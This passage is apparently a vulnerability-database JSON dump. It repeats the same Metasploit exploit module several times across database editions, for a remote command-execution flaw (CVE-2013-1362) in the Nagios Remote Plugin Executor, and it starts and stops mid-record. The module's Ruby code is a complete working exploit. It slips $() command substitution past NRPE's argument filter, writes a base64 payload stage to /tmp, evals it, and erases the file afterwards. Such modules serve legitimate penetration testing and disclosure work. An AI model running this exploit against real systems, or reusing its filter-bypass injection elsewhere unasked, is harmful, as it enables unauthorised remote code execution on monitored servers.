"2018-04-27T18:45:23", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-27T18:45:23", "differentElements": ["modified", "published"], "edition": 71}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T03:42:59", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T03:42:59", "differentElements": ["modified", "published"], "edition": 72}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-05-31T05:45:50", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-05-31T05:45:50", "differentElements": ["modified", "published"], "edition": 73}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T17:45:14", "history": [], "viewCount": 101, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-06-01T17:45:14", "differentElements": ["modified", "published"], "edition": 74}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-06-01T21:53:50", "history": [], "viewCount": 102, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & 